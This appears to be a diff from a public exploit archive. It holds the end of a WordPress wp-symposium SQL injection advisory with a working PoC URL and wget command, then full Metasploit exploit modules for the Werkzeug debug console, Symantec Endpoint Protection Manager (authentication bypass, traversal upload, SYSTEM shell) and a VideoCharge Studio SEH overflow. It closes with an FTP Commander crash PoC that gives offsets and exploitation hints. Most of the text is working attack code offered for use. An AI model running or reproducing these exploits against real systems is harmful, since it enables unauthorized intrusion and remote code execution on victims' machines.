4. Common Vulnerability Scoring System
* Exploitability Metrics
- Access Vector (AV) : Network (AV:N)
- Access Complexity (AC) : Low (AC:L)
- Authentication (Au) : None (Au:N)
* Impact Metrics
- Confidentiality Impact (C) : Partial (C:P)
- Integrity Impact (I) : Partial (I:P)
- Availability Impact (A) : Partial (A:P)
* CVSS v2 Vector (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVSS Base Score : 7.5
- Impact Subscore 6.4
- Exploitability Subscore 10
5. Proof of Concept
PoC URL : http://localhost/<WP-path>/wp-content/plugins/wp-symposium/get_album_item.php?size=version%28%29%20;%20--
PoC Command (Unix) : wget "http://localhost/<WP-path>/wp-content/plugins/wp-symposium/get_album_item.php?size=version%28%29%20;%20--" -O output.txt
In the content of the HTTP response you will find the MySQL version, for example :
5.5.44-0+deb7u1
6. Vulnerability Timeline
2015-05 : Vulnerability identified
2015-07-30 : Vendor informed about this issue
2015-07-30 : Vendor confirms the issue
2015-08-04 : Ask for a delay to deploy the fix
2015-08-04 : Response : 1-2 days (needs testing)
2015-08-07 : Update to version 15.8 is available
2015-08-10 : Disclosure of this document (a diff on the patch will trivially reveal the issue)
7. Solution
Update Wordpress plugin wp-symposium to the latest version, which is 15.8 at the date I am writing this.
8. Personal Notes
I am not a security professional, just a fan of computer security.
If you have any questions/remarks, feel free to contact me.
I'm interesting in any discussion/advice/question/criticism about security/exploits/programming :-)

87
platforms/python/remote/37814.rb Executable file
View file

@ -0,0 +1,87 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rex'
class Metasploit4 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Werkzeug Debug Shell Command Execution',
'Description' => %q{
This module will exploit the Werkzeug debug console to put down a
Python shell. This debugger "must never be used on production
machines" but sometimes slips passed testing.
Tested against:
0.9.6 on Debian
0.9.6 on Centos
0.10 on Debian
},
'Author' => 'h00die <mike[at]shorebreaksecurity.com>',
'References' =>
[
['URL', 'http://werkzeug.pocoo.org/docs/0.10/debug/#enabling-the-debugger']
],
'License' => MSF_LICENSE,
'Platform' => ['python'],
'Targets' => [[ 'werkzeug 0.10 and older', {}]],
'Arch' => ARCH_PYTHON,
'DefaultTarget' => 0,
'DisclosureDate' => 'Jun 28 2015'
))
register_options(
[
OptString.new('TARGETURI', [true, 'URI to the console', '/console'])
], self.class
)
end
def check
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(datastore['TARGETURI'])
)
# https://github.com/mitsuhiko/werkzeug/blob/cc8c8396ecdbc25bedc1cfdddfe8df2387b72ae3/werkzeug/debug/tbtools.py#L67
if res && res.body =~ /Werkzeug powered traceback interpreter/
return Exploit::CheckCode::Appears
end
Exploit::CheckCode::Safe
end
def exploit
# first we need to get the SECRET code
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(datastore['TARGETURI'])
)
if res && res.body =~ /SECRET = "([a-zA-Z0-9]{20})";/
secret = $1
vprint_status("Secret Code: #{secret}")
send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(datastore['TARGETURI']),
'vars_get' => {
'__debugger__' => 'yes',
'cmd' => payload.encoded,
'frm' => '0',
's' => secret
}
)
else
print_error('Secret code not detected.')
end
end
end

139
platforms/win32/remote/37812.rb Executable file
View file

@ -0,0 +1,139 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit4 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::FileDropper
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => 'Symantec Endpoint Protection Manager Authentication Bypass and Code Execution',
'Description' => %q{
This module exploits three separate vulnerabilities in Symantec Endpoint Protection Manager
in order to achieve a remote shell on the box as NT AUTHORITY\SYSTEM. The vulnerabilities
include an authentication bypass, a directory traversal and a privilege escalation to
get privileged code execution.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Markus Wulftange', #discovery
'bperry' # metasploit module
],
'References' =>
[
['CVE', '2015-1486'],
['CVE', '2015-1487'],
['CVE', '2015-1489'],
['URL', 'http://codewhitesec.blogspot.com/2015/07/symantec-endpoint-protection.html']
],
'DefaultOptions' => {
'SSL' => true
},
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic',
{
'Arch' => ARCH_X86,
'Payload' => {
'DisableNops' => true
}
}
],
],
'Privileged' => true,
'DisclosureDate' => 'Jul 31 2015',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(8443),
OptString.new('TARGETURI', [true, 'The path of the web application', '/']),
], self.class)
end
def exploit
meterp = Rex::Text.rand_text_alpha(10)
jsp = Rex::Text.rand_text_alpha(10)
print_status("#{peer} - Getting cookie...")
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),
'method' => 'POST',
'vars_post' => {
'ActionType' => 'ResetPassword',
'UserID' => 'admin',
'Domain' => ''
}
})
unless res && res.code == 200
fail_with(Failure::Unknown, "#{peer} - The server did not respond in an expected way")
end
cookie = res.get_cookies
if cookie.nil? || cookie.empty?
fail_with(Failure::Unknown, "#{peer} - The server did not return a cookie")
end
exec = %Q{<%@page import="java.io.*,java.util.*,com.sygate.scm.server.util.*"%>
<%=SemLaunchService.getInstance().execute("CommonCMD", Arrays.asList("/c", System.getProperty("user.dir")+"\\\\..\\\\webapps\\\\ROOT\\\\#{meterp}.exe")) %>
}
print_status("#{peer} - Uploading payload...")
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),
'method' => 'POST',
'vars_get' => {
'ActionType' => 'BinaryFile',
'Action' => 'UploadPackage',
'PackageFile' => "../../../tomcat/webapps/ROOT/#{meterp}.exe",
'KnownHosts' => '.'
},
'data' => payload.encoded_exe,
'cookie' => cookie,
'ctype' => ''
})
unless res && res.code == 200
fail_with(Failure::Unknown, "#{peer} - Server did not respond in an expected way")
end
register_file_for_cleanup("../tomcat/webapps/ROOT/#{meterp}.exe")
print_status("#{peer} - Uploading JSP page to execute the payload...")
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),
'method' => 'POST',
'vars_get' => {
'ActionType' => 'BinaryFile',
'Action' => 'UploadPackage',
'PackageFile' => "../../../tomcat/webapps/ROOT/#{jsp}.jsp",
'KnownHosts' => '.'
},
'data' => exec,
'cookie' => cookie,
'ctype' => ''
})
unless res && res.code == 200
fail_with(Failure::Unknown, "#{peer} - Server did not respond in an expected way")
end
register_file_for_cleanup("../tomcat/webapps/ROOT/#{jsp}.jsp")
print_status("#{peer} - Executing payload. Manual cleanup will be required.")
send_request_cgi({
'uri' => normalize_uri(target_uri.path, "#{jsp}.jsp")
}, 5)
end
end

30
platforms/windows/dos/37810.txt Executable file
View file

@ -0,0 +1,30 @@
********************************************************************************************
# Exploit Title: FTP Commander 'Costum Command' SEH Over-Write(Buffer Overflow).
# Date: 8/17/2015
# Exploit Author: Un_N0n
# Software Vendor : http://www.internet-soft.com/
# Software Link: http://www.internet-soft.com/ftpcomm.htm
# Version: 8.02
# Tested on: Windows 7 x32(32 BIT)
********************************************************************************************
[Steps to Produce the Crash]:
1- open 'ftpcomm.exe'.
2- Goto FTP - Server > Costum Command.
3- Below the SERVER LIST a input-box will appear, enter the contents of the crash.txt into it, then press Do it!.
4- Software will crash saying 'Access Violation at address XXXXXXXX......'.
This is basic SEH Over-write, i have tried to make a working exploit on WIN 7 x32 but no luck since this-
program does not have its own DLLs and using Windows DLLs is not a good idea b/c SAFESEH, have tried
other techniques but the final exploit seems to be un-stable.
[Code to produce crash.txt]:
junk = "A"*6000
file = open("crash.txt",'w')
file.write(junk)
file.close()
The following details are for those who would like to develop a working exploit for this software:
OFFSET: 4112 + BBBB[NSEH] + CCCC[SEH] ...
Hint: ~You can try loading the address from outside the address range of loaded modules.~ ;)
*****************************************************************************************************************************

86
platforms/windows/local/37813.rb Executable file
View file

@ -0,0 +1,86 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'VideoCharge Studio Buffer Overflow (SEH)',
'Description' => %q{
This module exploits a stack based buffer overflow in VideoCharge Studio 2.12.3.685 when
processing a specially crafted .VSC file. This vulnerability could be
exploited by a remote attacker to execute arbitrary code on the target
machine by enticing a user of VideoCharge Studio to open a malicious .VSC file.
},
'License' => MSF_LICENSE,
'Author' =>
[
'metacom', # Original discovery
'Andrew Smith', # MSF module
'Christian Mehlmauer' # MSF module
],
'References' =>
[
[ 'OSVDB', '69616' ],
[ 'EBD', '29234' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process'
},
'Platform' => 'win',
'Payload' =>
{
'BadChars' => "\x00\x0a\x0d\x3c\x22\x26",
'DisableNops' => true,
'Space' => 2808
},
'Targets' =>
[
[ 'VideoCharge Studio 2.12.3.685',
{
'Ret' => 0x61B811F1, #p/p/r | zlib1.dll
'Offset' => 2184
}
],
],
'Privileged' => false,
'DisclosureDate' => 'Oct 27 2013',
'DefaultTarget' => 0))
register_options([OptString.new('FILENAME', [ false, 'The file name.', 'msf.vsc']),], self.class)
end
def exploit
buffer = rand_text_alpha(target['Offset'])
buffer << generate_seh_record(target.ret)
buffer << payload.encoded
file = %Q|<?xml version="1.0" encoding="Windows-1252" ?><config ver="2.12.3.685">
<cols name="Files"/>
<cols name="Profiles">
<Property name="Profile">
<cols name="Formats">
<Property name="Stream">
<Value name="Name" type="8" value="#{buffer}"/>
</Property>
</cols>
</Property>
</cols>
</config>|
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(file)
end
end